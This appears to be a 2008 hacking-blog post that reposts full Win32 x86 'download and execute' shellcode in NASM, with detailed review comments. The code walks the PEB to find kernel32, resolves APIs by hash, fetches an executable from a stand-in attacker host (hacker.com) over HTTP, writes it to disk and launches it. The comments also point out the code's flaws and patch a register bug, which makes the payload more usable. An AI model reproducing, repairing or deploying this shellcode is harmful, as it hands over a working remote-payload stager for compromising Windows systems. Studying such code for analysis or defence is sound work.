Beng Hacks: Some nice stuff

Thursday, March 13, 2008

Some nice stuff

Courtesy of my friend snooq!

; Author : snooq [http://www.redpuffer.net/snooq/]
; Date : 12 August 2005


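; ---------------------------------------------------------------------------
; Win32 x86 "download & execute" shellcode (NASM / Intel syntax, 32-bit).
; All API calls are stdcall: arguments are pushed right-to-left and the
; callee removes them, so esp is back where it was after every `call`.
;
; What it does, in order:
;   1. Finds the base of kernel32.dll through the PEB loader list, then
;      resolves ten APIs by ROR-13 name hash (GetProcAdd, further down),
;      loading wininet.dll with LoadLibraryA when it reaches the WinINet slots.
;   2. Opens "http://hacker.com/a.exe" with WinINet, reads ONE chunk of it into
;      a buffer and writes that chunk to "a.exe" in the current directory.
;   3. Runs "a.exe" via CreateProcessA and ends the current thread (ExitThread).
;
; Stack layout once ebp is set: [ebp+4 .. ebp+0x28] hold the ten hashes,
; each overwritten in place by the resolved address; [ebp+0x2c] is the DLL
; base handed to GetProcAdd. [ebp+0x30 .. ebp+0x40] are scratch slots that
; lie ABOVE the table, i.e. in whatever the stack held before the shellcode
; started; that is tolerable only because the code never returns.
;
; NOTE(review): the encoding contains NUL bytes (the 'wininet' and URL
; pushes, `mov eax, [fs:0x30]`, `push dword 0x40000000`), so it cannot be
; delivered through a C-string copy without an encoder. No API return value
; is checked anywhere, the download is plain HTTP with no integrity check,
; and only one InternetReadFile call is made, so a file larger than the
; first chunk returned is silently truncated (a read/write loop until the
; returned length is 0 would be needed). The kernel32 lookup assumes it is
; the second module in InInitializationOrderModuleList, which held on
; XP/2003-era Windows; on later versions that position reportedly differs —
; verify on the target.
; ---------------------------------------------------------------------------
[BITS 32]
; --- locate kernel32.dll via the PEB ---------------------------------------
mov eax, [fs:0x30]             ; eax = PEB (TEB->ProcessEnvironmentBlock)
mov eax, [eax + 0x0c]          ; eax = PEB->Ldr
mov esi, [eax + 0x1c]          ; esi = Ldr->InInitializationOrderModuleList.Flink (1st entry)
lodsd                          ; eax = that entry's Flink -> 2nd entry (assumed kernel32.dll)
mov esi, [eax + 0x08]          ; esi = DllBase, 0x08 past the init-order links of the entry

; --- hash table; each slot becomes the resolved address -------------------
push esi ; kernel32.dll ; [ebp + 0x2c] -> dll base for GetProcAdd (swapped for wininet later)
push 0xec0e4e8e ; LoadLibraryA ; [ebp + 0x28]
push 0x16b3fe72 ; CreateProcessA ; [ebp + 0x24]
push 0x60e0ceef ; ExitThread ; [ebp + 0x20]
push 0x7c0017a5 ; CreateFileA ; [ebp + 0x1c]
push 0xe80a791f ; WriteFile ; [ebp + 0x18]
push 0x0ffd97fb ; CloseHandle ; [ebp + 0x14]
push 0xb46984e7 ; HeapCreate ; [ebp + 0x10]
push 0x57e84429 ; InternetOpenA ; [ebp + 0x0c]   (wininet)
push 0x7e0fed49 ; InternetOpenUrlA ; [ebp + 0x08] (wininet)
push 0x5fe34b8b ; InternetReadFile ; [ebp + 0x04] (wininet)

push ebp                       ; [ebp + 0x00] = saved ebp
mov ebp, esp                   ; slot i (1..10) is [ebp + i*4]

push byte 0x0a ; # of functions to find
pop ecx                        ; ecx = 10, via push/pop to keep the encoding NUL-free
L1:
cmp cl, 0x03 ; to load wininet.dll  ; slots 3..1 are WinINet exports: load the DLL first
je Load_WININET

L2:
push dword [ebp + 0x2c]        ; arg 2: dll base
push dword [ebp + ecx * 0x04]  ; arg 1: name hash
call GetProcAdd                ; eax = address; preserves ecx/esi, clobbers ebx/edx/edi
mov [ebp + ecx * 0x04], eax    ; replace the hash with the resolved address
loop L1                        ; ecx--, next slot while ecx != 0

jmp short Download

Load_WININET:
push ecx                       ; keep the slot counter across the string pushes
push 0x0074656e                ; "net\0"
push 0x696e6977 ; 'wininet'    ; "wini" -> "wininet\0" now starts at [esp]
push esp                       ; arg: lpLibFileName
call [ebp + 0x28] ; LoadLibraryA
mov [ebp + 0x2c], eax ; wininet.dll ; GetProcAdd now resolves against wininet (NULL unchecked)
pop ecx                        ; discard "net\0"
pop ecx                        ; discard "wini"
pop ecx                        ; restore slot counter (== 3)
jmp short L2

Download:
xor ebx, ebx
push ebx                       ; NUL terminator for the URL
push 0x00000065 ; 000e         ; "e\0\0\0"
push 0x78652e61 ; xe.a         ; "a.ex"
push 0x2f6d6f63 ; /moc         ; "com/"
push 0x2e72656b ; .rek         ; "ker."
push 0x6361682f ; cah/         ; "/hac"
push 0x2f3a7074 ; /:pt         ; "tp:/"
push 0x74680065 ; th e         ; "e\0ht" -> ends the file name, starts "http://"
push 0x78652e61 ; xe.a         ; "a.ex"
; [esp] now reads "a.exe\0http://hacker.com/a.exe\0":
;   filename "a.exe" at [esp] == [ebp - 0x24]  (relative path: current directory)
;   url at [esp + 6]         == [ebp - 0x1e]  (placeholder host, plain HTTP)

dec ebx                        ; ebx = 0xffffffff
shr ebx, 0x0e                  ; ebx = 0x3ffff
push ebx                       ; arg 3: dwMaximumSize = 0x3ffff
shr ebx, 0x01                  ; ebx = 0x1ffff; stays live as the read size below
push ebx                       ; arg 2: dwInitialSize = 0x1ffff
push byte 0x04                 ; arg 1: flOptions = 4 (HEAP_GENERATE_EXCEPTIONS)
call [ebp + 0x10] ; HeapCreate()
mov [ebp + 0x30], eax ; [ebp + 0x30] -> heap handle
; NOTE(review): the heap HANDLE itself is passed as the receive buffer below;
; there is no HeapAlloc. That works in practice only because the handle is
; the heap's base address and nothing else touches this private heap.

xor edx, edx
push edx                       ; dwFlags = 0
push edx                       ; lpszProxyBypass = NULL
push edx                       ; lpszProxy = NULL
push edx                       ; dwAccessType = 0 (INTERNET_OPEN_TYPE_PRECONFIG)
push edx                       ; lpszAgent = NULL
call [ebp + 0x0c] ; InternetOpenA()
mov [ebp + 0x34], eax          ; session HINTERNET (overwritten below, never closed)

; [ebp-0x24] -> filename (== esp here; the stdcall callees cleaned their args)
; [ebp-0x1e] -> url

mov ecx, esp
add ecx, 0x06                  ; ecx = &url
xor edx, edx                   ; FIX: edx is caller-saved and was just clobbered by the
                               ; API call above; the four NULL args below relied on it
                               ; still being 0 (re-zeroed before CreateFileA/WriteFile, not here)
push edx                       ; dwContext = 0
push edx                       ; dwFlags = 0
push edx                       ; dwHeadersLength = 0
push edx                       ; lpszHeaders = NULL
push ecx                       ; lpszUrl
push dword [ebp + 0x34]        ; hInternet (session)
call [ebp + 0x08] ; InternetOpenUrlA()
mov [ebp + 0x34], eax ; [ebp + 0x34] -> HINTERNET for the URL (NULL on failure, unchecked)

mov ecx, esp                   ; ecx = &filename "a.exe"
xor edx, edx
push edx                       ; hTemplateFile = NULL
push edx                       ; dwFlagsAndAttributes = 0
push 0x02                      ; dwCreationDisposition = CREATE_ALWAYS
push edx                       ; lpSecurityAttributes = NULL
push edx                       ; dwShareMode = 0
push dword 0x40000000          ; dwDesiredAccess = GENERIC_WRITE
push ecx                       ; lpFileName
call [ebp + 0x1c] ; CreateFile()
mov [ebp + 0x38], eax ; [ebp + 0x38] -> file handle

mov ecx, ebp
add ecx, 0x3c ; [ebp + 0x3c] -> rlen (bytes actually read)
push ecx                       ; lpdwNumberOfBytesRead
push ebx                       ; dwNumberOfBytesToRead = 0x1ffff
push dword [ebp + 0x30]        ; lpBuffer = heap "handle" (see note above)
push dword [ebp + 0x34]        ; hFile (URL HINTERNET)
call [ebp + 0x04] ; InternetReadFile()   ; single call: see truncation note in the header

mov ecx, ebp
add ecx, 0x40 ; [ebp + 0x40] -> wlen (bytes written)
xor edx, edx
push edx                       ; lpOverlapped = NULL
push ecx                       ; lpNumberOfBytesWritten
push dword [ebp + 0x3c]        ; nNumberOfBytesToWrite = rlen
push dword [ebp + 0x30]        ; lpBuffer
push dword [ebp + 0x38]        ; hFile
call [ebp + 0x18] ; WriteFile()

push dword [ebp + 0x38]
call [ebp + 0x14] ; CloseHandle()     ; the URL handle and heap are never released

mov edx, esp                   ; edx = &"a.exe" -> lpCommandLine

; --- zeroed PROCESS_INFORMATION (16 bytes) + STARTUPINFO (0x44 bytes) ------
sub esp, 0x54                  ; 0x15 dwords: pi at [esp], si at [esp + 0x10]
lea edi, [esp]
xor eax, eax                   ; eax = 0, reused as the NULL/0 arguments below
push byte 0x15
pop ecx
rep stosd                      ; zero-fill both structures

mov byte [esp + 0x10], 0x44 ; SI.cb = sizeof(STARTUPINFO)
lea ebx, [esp + 0x10] ; SI
push esp ; PI                  ; lpProcessInformation (value of esp before this push)
push ebx                       ; lpStartupInfo
push eax                       ; lpCurrentDirectory = NULL
push eax                       ; lpEnvironment = NULL
push eax                       ; dwCreationFlags = 0
push eax                       ; bInheritHandles = FALSE
push eax                       ; lpThreadAttributes = NULL
push eax                       ; lpProcessAttributes = NULL
push edx                       ; lpCommandLine = "a.exe"
push eax                       ; lpApplicationName = NULL
call [ebp + 0x24] ; CreateProcessA()

; No exit code is pushed: ExitThread reads whatever dword is at [esp]
; (the pi block). Only the calling thread ends; the host process survives
; if it has other threads.
call [ebp + 0x20] ; ExitThread()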

; Function to retrieve a function address from a module's export table
; by ROR-13 hash of its name (the classic Metasploit-style hash:
; edi = ror(edi, 13) + byte, over the NUL-terminated export name).
;
; Parameters (stdcall, pushed by the caller): function hash, dll base
;   [esp + 0x0c] after the two pushes below = hash
;   [esp + 0x10] after the two pushes below = dll base
; Return: eax = function address (base + export RVA)
;   If no name matches, eax is left with the last hash-loop value, i.e. 0
;   in practice (al is 0 after the terminating lodsb); if the export table
;   has no names at all it is the e_lfanew value loaded below — callers
;   do not check either case.
; Preserves: ecx, esi (saved/restored). Clobbers: eax, ebx, edx, edi, flags.
; Cleans its own 8 bytes of arguments (ret 0x08).
; NOTE(review): forwarded exports are not detected (the returned "address"
; would point at a forwarder string); presumably none of the ten names used
; here are forwarded on the intended target — verify.

GetProcAdd:
push ecx
push esi

mov esi, [esp + 0x10] ; dll base
mov eax, [esi + 0x3c] ; PE header address (e_lfanew)
mov edx, [esi + eax + 0x78] ; Export table relative offset (DataDirectory[0].VirtualAddress)
add edx, esi ; Export table address
mov ecx, [edx + 0x18] ; Number of names
mov ebx, [edx + 0x20] ; Names table relative offset (AddressOfNames)
add ebx, esi ; Names table address

; Walk the name table backwards: ecx counts down from NumberOfNames to 0.
Find:
jecxz Done ; ecx == 0 -> exhausted, return without a match
dec ecx
mov esi, [ebx + ecx * 0x04] ; Relative offset of the name
add esi, [esp + 0x10] ; ptr to current name

xor edi, edi ; edi = hash accumulator
xor eax, eax ; eax = 0 so lodsb yields a zero-extended byte in eax
cld ; lodsb must walk forward

Hash:
lodsb ; Load the next byte from esi into al
test al, al ; Test ourselves.
jz Compare ; If the ZF is set, we've hit the null term.
ror edi, 0xd ; Rotate edi 13 bits to the right
add edi, eax ; Add the new byte to the accumulator
jmp short Hash ; Next iteration


Compare:
cmp edi, [esp + 0x0c] ; Compare 2 hashes
jnz Find
; Match: name index ecx -> ordinal -> function RVA.
mov ebx, [edx + 0x24] ; Ordinals table relative offset (AddressOfNameOrdinals)
add ebx, [esp + 0x10] ; Ordinals table address
mov cx, [ebx + ecx * 0x02] ; Extrapolate the function's ordinal (16-bit write: relies on ecx < 0x10000, which holds for any sane name count)
mov ebx, [edx + 0x1c] ; Address table relative offset (AddressOfFunctions)
add ebx, [esp + 0x10] ; Address table address
mov eax, [ebx + ecx * 0x04] ; Extract the relative function offset from its ordinal
add eax, [esp + 0x10] ; Function address

Done:
pop esi
pop ecx
ret 0x08

; Trailing nop padding; never executed (GetProcAdd returns before it and the
; main path ends in ExitThread). Not part of the shellcode's logic.
nop
nop
nop
nop
nop
nop
nop
nop


Can you figure out what it does? :)
